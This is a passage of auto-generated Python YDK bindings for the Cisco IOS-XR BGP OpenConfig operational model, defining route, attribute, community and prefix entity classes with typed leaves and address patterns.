def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "adj-rib-in-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibInPost']['meta_info']
class AdjRibOutPost(_Entity_):
"""
Adjacency rib out\-bound post\-policy table
.. attribute:: routes
routes table
**type**\: :py:class:`Routes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes>`
**config**\: False
.. attribute:: num_routes
Number of routes in adjacency rib out\-bound post\-policy table
**type**\: :py:class:`NumRoutes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost, self).__init__()
self.yang_name = "adj-rib-out-post"
self.yang_parent_name = "open-config-neighbor"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("routes", ("routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes)), ("num-routes", ("num_routes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes))])
self._leafs = OrderedDict()
self.routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes()
self.routes.parent = self
self._children_name_map["routes"] = "routes"
self.num_routes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.NumRoutes()
self.num_routes.parent = self
self._children_name_map["num_routes"] = "num-routes"
self._segment_path = lambda: "adj-rib-out-post"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost, [], name, value)
class Routes(_Entity_):
"""
routes table
.. attribute:: route
route entry
**type**\: list of :py:class:`Route <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes, self).__init__()
self.yang_name = "routes"
self.yang_parent_name = "adj-rib-out-post"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("route", ("route", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route))])
self._leafs = OrderedDict()
self.route = YList(self)
self._segment_path = lambda: "routes"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes, [], name, value)
class Route(_Entity_):
"""
route entry
.. attribute:: route
Network in prefix/length format
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])/(([0\-9])\|([1\-2][0\-9])\|(3[0\-2]))
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(/(([0\-9])\|([0\-9]{2})\|(1[0\-1][0\-9])\|(12[0\-8])))
**config**\: False
.. attribute:: neighbor_address
Neighbor address
**type**\: union of the below types:
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: path_id
Path ID
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: prefix_name
Prefix
**type**\: :py:class:`PrefixName <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName>`
**config**\: False
.. attribute:: route_attr_list
RouteAttributesList
**type**\: :py:class:`RouteAttrList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList>`
**config**\: False
.. attribute:: ext_attributes_list
ExtAttributesList
**type**\: :py:class:`ExtAttributesList <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList>`
**config**\: False
.. attribute:: last_modified_date
LastModifiedDate
**type**\: :py:class:`LastModifiedDate <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate>`
**config**\: False
.. attribute:: last_update_recieved
LastUpdateRecieved
**type**\: :py:class:`LastUpdateRecieved <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved>`
**config**\: False
.. attribute:: valid_route
ValidRoute
**type**\: bool
**config**\: False
.. attribute:: invalid_reason
IndentityRef
**type**\: :py:class:`BgpOcInvalidRouteReason <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcInvalidRouteReason>`
**config**\: False
.. attribute:: best_path
BestPath
**type**\: bool
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route, self).__init__()
self.yang_name = "route"
self.yang_parent_name = "routes"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix-name", ("prefix_name", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName)), ("route-attr-list", ("route_attr_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList)), ("ext-attributes-list", ("ext_attributes_list", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList)), ("last-modified-date", ("last_modified_date", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate)), ("last-update-recieved", ("last_update_recieved", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved))])
self._leafs = OrderedDict([
('route', (YLeaf(YType.str, 'route'), ['str','str'])),
('neighbor_address', (YLeaf(YType.str, 'neighbor-address'), ['str','str'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor.AdjRibOutPost.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
